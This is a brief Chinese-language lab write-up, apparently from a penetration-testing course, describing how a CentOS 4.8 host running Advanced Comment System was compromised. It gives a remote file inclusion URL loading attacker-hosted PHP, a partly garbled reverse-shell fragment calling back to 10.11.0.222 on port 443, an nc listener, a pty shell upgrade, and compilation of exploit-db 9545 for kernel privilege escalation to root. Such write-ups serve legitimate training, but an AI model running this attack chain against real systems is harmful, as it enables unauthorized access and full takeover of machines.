这台机子使用了一个Advance Comment System的webapp

Advance Comment System有RFI漏洞

具体链接

http://10.11.1.8/internal/advanced\_comment\_system/index.php?ACS\_path=http://10.11.0.222/evil.txt?

& /dev/tcp/10.11.0.222/443 0>&1;");?>

可以让机器执行http://10.11.0.222/evil.txt的php代码中的指令

在攻击机器上nc -lvp 443就可以获得的权限的shell

但是此时获得的shell不是TTY的shell,所以需要转成TTY的shell

发现目标机器上安装了python,于是

python -c ‘import pty; pty.spawn(“/bin/sh”)’

将其转换为TTY

使用linuxprivchecker扫描该机器,勋在可以提权的点

linuxprivchecker

 

经过linuxprivchecker检查发现目标系统为Centos4.8

非常老的版本了,很可能存在提权漏洞

搜索发现存在Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - ‘sock_sendpage()’ Local Privilege Escalation 漏洞

https://www.exploit-db.com/exploits/9545/

下载源代码,编译

gcc -Wall -m32 -o exploit 9545.c -Wl,–hash-style=both

如果是64位的kali,需要 apt-get install gcc-multilib 安装缺少的32位库。

由于目标系统较老,一些依赖和库也是较老的,所以我们需要在攻击机上编译好程序,并且加上红色字体的代码,静态编译链接库,才能让提权程序在目标机器上运行

编译完成之后将程序下载到目标机器上,执行。

root shell get!

proof.txt f56a325ef00d4553a4046b7eacc5d667